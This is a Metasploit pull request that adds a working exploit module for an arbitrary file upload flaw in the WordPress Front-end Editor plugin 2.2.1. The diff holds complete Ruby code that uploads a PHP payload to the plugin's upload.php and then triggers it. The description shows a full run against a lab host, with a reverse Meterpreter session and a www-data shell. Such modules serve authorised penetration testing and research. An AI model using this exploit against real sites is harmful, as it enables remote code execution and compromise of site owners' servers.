### PR TITLE
Add WordPress Front-end Editor File Upload Vuln

### DIFF
--- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if res.code == 200
         register_files_for_cleanup(filename)
       else
-        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
+        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
       end
     else
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')

--- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress Front-end Editor File Upload',
+      'Description'    => %q{
+          The Wordpress Front-end Editor plugin contains an authenticated file upload
+          vulnerability. We can upload arbitrary files to the upload folder, because
+          the plugin also uses it's own file upload mechanism instead of the wordpress
+          api it's possible to upload any file type.
+      },
+      'Author'         =>
+        [
+          'Sammy', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['OSVDB', '83637'],
+          ['WPVDB', '7569'],
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Front-End Editor 2.2.1', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 04 2012'))
+  end
+
+  def check
+    check_plugin_version_from_readme('front-end-editor', '2.3')
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to upload payload")
+    filename = "#{rand_text_alpha_lower(5)}.php"
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
+      'ctype'    => 'application/octet-stream',
+      'headers'  => {
+        'X-File-Name' => "#{filename}"
+      },
+      'data' => payload.encoded
+    )
+
+    if res
+      if res.code == 200
+        register_files_for_cleanup(filename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi(
+      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
+      5
+    )
+  end
+end


### PR DESCRIPTION
#### Add Wordpress Plugin Front-end Editor File Upload Vulnerability.

  Application: Wordpress Plugin 'Front-end Editor' 2.2.1
  Homepage: https://wordpress.org/plugins/front-end-editor
  Source Code: http://downloads.wordpress.org/plugin/front-end-editor.2.2.1.zip
  Active Installs (wordpress.org): 10,000+
  References: https://wpvulndb.com/vulnerabilities/7569
#### Vulnerable packages*

  2.2.1
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_frontend_editor_file_upload 
msf exploit(wp_frontend_editor_file_upload) > show options 

Module options (exploit/unix/webapp/wp_frontend_editor_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Front-End Editor 2.2.1


msf exploit(wp_frontend_editor_file_upload) > info

       Name: Wordpress Front-end Editor File Upload
     Module: exploit/unix/webapp/wp_frontend_editor_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-07-04

Provided by:
  Sammy
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Front-End Editor 2.2.1

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Wordpress Front-end Editor plugin contains an authenticated file 
  upload vulnerability. We can upload arbitrary files to the upload 
  folder, because the plugin also uses it's own file upload mechanism 
  instead of the wordpress api it's possible to upload any file type.

References:
  http://www.osvdb.org/83637
  https://wpvulndb.com/vulnerabilities/7569
  http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html

msf exploit(wp_frontend_editor_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_frontend_editor_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_frontend_editor_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.37:4444 
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file kgdmn.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51677) at 2015-04-25 21:57:59 -0300
[+] Deleted kgdmn.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 9646 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
